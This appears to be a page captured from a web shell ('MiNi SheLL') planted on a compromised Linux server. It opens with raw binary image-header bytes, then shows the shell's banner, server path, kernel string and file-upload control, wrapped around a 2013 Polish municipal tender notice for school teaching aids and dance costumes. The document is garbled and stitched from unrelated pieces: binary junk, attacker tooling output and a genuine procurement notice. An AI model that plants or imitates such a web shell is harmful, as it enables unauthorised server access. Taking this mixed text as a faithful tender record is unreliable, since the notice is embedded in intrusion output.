JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130115/21214-N-2013.html

<p class="kh_header"><b>Koźminek: Przyszłość w naszych rękach zakup pomocy dydaktycznych , wyposażenia i sprzętu elektronicznego. Dla szkół w ramach projektu  systemowego   przyszłość w naszych  rękach projekt realizowany  będzie  w ramach programu Operacyjnego kapitał ludzki  priorytet  IX. Rozwój  wykształcenia i kompetencje w regionie. Działania 9.1 wyrównanie szans edukacyjnych  i zapewnienie wysokiej jakości  usług edukacyjnych świadczonych w systemie  oświaty .Poddziałanie 9.1.2 wyrównanie  szans edukacyjnych  uczniów  z grup o utrudnionym dostępie do edukacji  oraz zmniejszenie różnic  w jakości usług edukacyjnych</b><br>
<b>Numer ogłoszenia: 21214 - 2013; data zamieszczenia: 15.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Koźminek , ul. Kościuszki 7, 62-840 Koźminek, woj. wielkopolskie, tel. 062 7637085, faks 062 7637207.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przyszłość w naszych rękach zakup pomocy dydaktycznych , wyposażenia i sprzętu elektronicznego. Dla szkół w ramach projektu  systemowego   przyszłość w naszych  rękach projekt realizowany  będzie  w ramach programu Operacyjnego kapitał ludzki  priorytet  IX. Rozwój  wykształcenia i kompetencje w regionie. Działania 9.1 wyrównanie szans edukacyjnych  i zapewnienie wysokiej jakości  usług edukacyjnych świadczonych w systemie  oświaty .Poddziałanie 9.1.2 wyrównanie  szans edukacyjnych  uczniów  z grup o utrudnionym dostępie do edukacji  oraz zmniejszenie różnic  w jakości usług edukacyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> zwana dalej  Zamawiającym  zaprasza Wykonawców do udziału w postępowaniu prowadzonym w trybie przetargu nieograniczonego na zadanie pn  jest zakup wraz z dostawą pomocy dydaktycznych wspierających indywidualizację procesu dydaktycznego w szkołach podstawowych na terenie Gminy Koźminek w ramach projektu   Przyszłość w naszych rękach zakup pomocy dydaktycznych , wyposażenia i sprzętu elektronicznego. Dla szkół w ramach projektu  systemowego   przyszłość w naszych  rękach projekt realizowany  będzie  w ramach programu Operacyjnego kapitał ludzki  priorytet  IX. Rozwój  wykształcenia i kompetencje w regionie. Działania 9.1 wyrównanie szans edukacyjnych  i zapewnienie wysokiej jakości  usług edukacyjnych świadczonych w systemie  oświaty .Poddziałanie 9.1.2 wyrównanie  szans edukacyjnych  uczniów  z grup o utrudnionym dostępie do edukacji  oraz zmniejszenie różnic  w jakości usług edukacyjnych  
2.	Postępowanie prowadzone jest zgodnie z ustawą z dnia 29 stycznia 2004r,  Prawo zamówień publicznych Dz. U. z 2010r. Nr 113, poz. 759 z późn. zm. zwaną dalej Pzp.
3.	Ogłoszenie o zamówieniu zamieszczono w Biuletynie Zamówień Publicznych, na tablicy ogłoszeń w siedzibie Zamawiającego oraz na stronie internetowej Zamawiającego http bip.kozminek.pl
4.	Wykonawca winien zapoznać się ze wszystkimi wymaganiami określonymi niniejszej specyfikacji, zwanej dalej SIWZ.
5.	Wykonawca ponosi wszelkie koszty związane z przygotowaniem i złożeniem oferty. Wymaga się, aby Wykonawca zdobył wszystkie informacje, które mogą być konieczne do przygotowania oferty oraz podpisania umowy.
6.	Postępowanie o udzielenie zamówienia prowadzone jest w języku polskim. Rozliczenia między Zamawiającym a Wykonawcą prowadzone będzie w PLN.
7.	Zgodnie z art. 82 ust. 1 PZP, Wykonawca może  złożyć tylko jedna ofertę.
8.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
9.	Zamawiający dopuszcza składania ofert częściowych:
             dla część  I - pomoce dydaktyczne  
             dla  część II -ubiór  do tańca  
10.	Zamawiający nie dopuszcza złożenia ofert wariantowych.
11.	Zamawiający nie przewiduje:
1	zebrania Wykonawców,
2	zawarcia umowy ramowej,
3	wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej,
4	ustanowienia dynamicznego systemu zakupów,
5	zwrotu kosztów udziału w postępowaniu,
6	wymagań związanych z realizacją zamówienia, o których mowa w art. 29 ust. 4 PZP.
12.Wybrany Wykonawca jest zobowiązany do zawarcia umowy w terminie i miejscu wyznaczonym przez Zamawiającego.
13.Wykonawca jest zobowiązany do wskazania w ofercie jaką część zamówienia zamierza powierzyć do wykonania podwykonawcom.
II.	OPIS PRZEDMIOTU ZAMÓWIENIA
1.Przedmiotem zamówienia jest zakup wraz z dostawą pomocy dydaktycznych wspierających indywidualizację procesu dydaktycznego w szkołach podstawowych na terenie Gminy Koźminek w ramach projektu  Przyszłość w naszych rękach zakup pomocy dydaktycznych , wyposażenia i sprzętu elektronicznego. Dla szkół w ramach projektu  systemowego   przyszłość w naszych  rękach projekt realizowany  będzie  w ramach programu Operacyjnego kapitał ludzki  priorytet  IX. Rozwój  wykształcenia i kompetencje w regionie. Działania 9.1 wyrównanie szans edukacyjnych  i zapewnienie wysokiej jakości  usług edukacyjnych świadczonych w systemie  oświaty .Poddziałanie 9.1.2 wyrównanie  szans edukacyjnych  uczniów  z grup o utrudnionym dostępie do edukacji  oraz zmniejszenie różnic  w jakości usług edukacyjnych ,,  
2.	Szczegółowy opis przedmiotu zamówienia poszczególnych części zamówienia zawiera załącznik nr 5 do SIWZ.
3.	Szczegółowe wymagania związane z dostawą pomocy dydaktycznych i sprzętu:
1	Wszystkie pomoce dydaktyczne i sprzęt muszą być fabrycznie nowe, wolne od wad, wykonane w ramach bezpiecznej technologii oraz dopuszczone do stosowania w placówkach oświatowych;
2	Wszystkie pomoce dydaktyczne i sprzęt winny spełniać wymagania norm UE. Produkty, które tego wymagają winny posiadać niezbędne certyfikaty bezpieczeństwa, atesty, świadectwa jakości i spełniać wszelkie wymogi norm określonych obowiązującym prawem
3	Zamawiający wymaga udzielenia 12 miesięcznej gwarancji na dostarczone produkty  licząc od daty odbioru tego sprzętu, na podstawie protokołu zdawczo - odbiorczego.
4	Wykonawca zobowiązany jest dostarczyć materiały dydaktyczne i naukowe w pogrupowanych pakietach dla danej szkoły szkół według załącznika nr 5 do SIWZ.
5)	Wykonawca jest zobowiązany poinformować Zamawiającego (faksem, telefonicznie lub pisemnie) o terminie dostawy co najmniej z 2 dniowym wyprzedzeniem. Odbiór przedmiotu umowy nastąpi w uzgodnionym z Zamawiającym dniu roboczym tj. od poniedziałku do piątku w godz. 8.00-13.00.
6)	Wykonawca dostarczy pomoce dydaktyczne, sprzęt do szkół na własny koszt i na własne ryzyko oraz zapewni rozładunek ze  środków transportowych i wniesienie dostawy do pomieszczeń budynków w godzinach pracy szkoły.
7)	Miejscem dostawy będą siedziby szkół:
                 - Szkoła Podstawowa w Koźminku
                 -  Szkoła Podstawowa  Nowym Nakwasinie
               -  Szkoła Podstawowa Moskurni  
.
8)	Odbioru przedmiotu umowy i podpisania protokołu końcowego odbioru dokona w imieniu Zamawiającego upoważniony przez Wójta Pracownik  Dyrektor szkoły Protokoły odbioru podpisane przez przedstawiciela Wykonawcy i właściwego Dyrektora szkoły lub upoważnionego pracownika będą podstawą do wystawienia faktury.
9)	Termin płatności faktur ustala się przynajmniej na 21 dni od daty otrzymania ich przez  Zamawiającego
7.	Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.
8.	Oferty równoważne: Zamawiający  nie dopuszcza złożenie ofert równoważnych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie o spełnieniu warunku udziału w postępowaniu załącznik nr 2 siwz</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Z zastrzeżeniem postanowień ustępów 2, 3 niniejszego punktu niedopuszczalne są istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy.
2.	Dopuszczalne są jednakże za zgodą Zamawiającego istotne zmiany zawartej umowy, pod warunkiem, że  są one korzystne dla Zamawiającego i dotyczą choćby jednej z kwestii określonych w ustępie 3 niniejszego punktu.
3.	Zmiany, o których mowa w ust. 2, mogą wyłącznie dotyczyć:
1)	Zmiany terminów wykonania przedmiotu umowy i okresu obowiązywania umowy wynikającej z okoliczności, których nie można było przewidzieć w ogłoszeniu o zamówieniu lub SIWZ
2)	Zmiana postanowień umowy w przypadku wystąpienia działania siły wyższej, uniemożliwiającej wykonanie przedmiotu umowy
3)	Zmiana umowy będąca konsekwencja wystąpienia w trakcie realizacji zamówienia zmian przepisów prawa Unii Europejskiej lub prawa krajowego, mających wpływ na realizację zamówienia i powodujących konieczność dostosowania do obowiązujących przepisów.
4.	Warunkiem dokonania zmian, o których mowa w ust. 3, jest złożenie wniosku przez stronę inicjującą zmianę zawierającego:
1)	opis propozycji zmiany umowy,
2)	uzasadnienie zmiany umowy,
3)	obliczenie kosztów zmiany zgodnie z zasadami określonymi w umowie, jeżeli zmiana będzie miała wpływ na wynagrodzenie,
4)	opis wpływu zmiany na termin wykonania umowy.
5.	Dokonanie zmian, o których mowa w ust. 3, wymaga podpisania aneksu do umowy, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kozminek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy  w Koźminku ul. Kościuszki 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.01.2013 godzina 10:00, miejsce: Urząd Gminy w Koźminku ul Kościuszki 7 pokój nr 12 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przyszłość w naszych rękach zakup pomocy dydaktycznych , wyposażenia i sprzętu elektronicznego. Dla szkół w ramach projektu  systemowego   przyszłość w naszych  rękach projekt realizowany  będzie  w ramach programu Operacyjnego kapitał ludzki  priorytet  IX. Rozwój  wykształcenia i kompetencje w regionie. Działania 9.1 wyrównanie szans edukacyjnych  i zapewnienie wysokiej jakości  usług edukacyjnych świadczonych w systemie  oświaty .Poddziałanie 9.1.2 wyrównanie  szans edukacyjnych  uczniów  z grup o utrudnionym dostępie do edukacji  oraz zmniejszenie różnic  w jakości usług edukacyjnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> pomoce dydaktyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I
Szkoła  Podstawowa w  Nowym Nakwasinie 
Indywidualizacja procesu nauczania i wychowania uczniów klas I-III
Pomoce dydaktyczne 2012 2013
Szkoła  Podstawowa w  Koźminku 
Indywidualizacja procesu nauczania i wychowania uczniów klas I-III
Pomoce dydaktyczne 2012/2013
Szkoła  Podstawowa w  Moskurni 
Indywidualizacja procesu nauczania i wychowania uczniów klas I-III
Pomoce dydaktyczne 2012/2013.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ubiór  do tańca.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Spódnice  czerwone kloszowe z naszytymi czarnymi grochami i cekinami ( w pasie guma).
Gorsety czarne.
Czerwone body  z krótkim rękawem z dodatkiem lycry
Spódnice żółte obszyte na dole cekinami ( w pasie guma).
Żółte body z krótkim rękawem z dodatkiem lycry
Skrzydełka pszczółek
Spódnice zielone kloszowe obszyte na dole cekinami ( w pasie guma).
Zielone body z krótkim rękawem z dodatkiem lycry
Długa zielona sukienka wyszywana cekinami
Krótkie zielone spodenki z szelkami
Baletki czerwone
Baletki żółte
Baletki zielone
Kapelusz zielony
Czółki pszczół.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com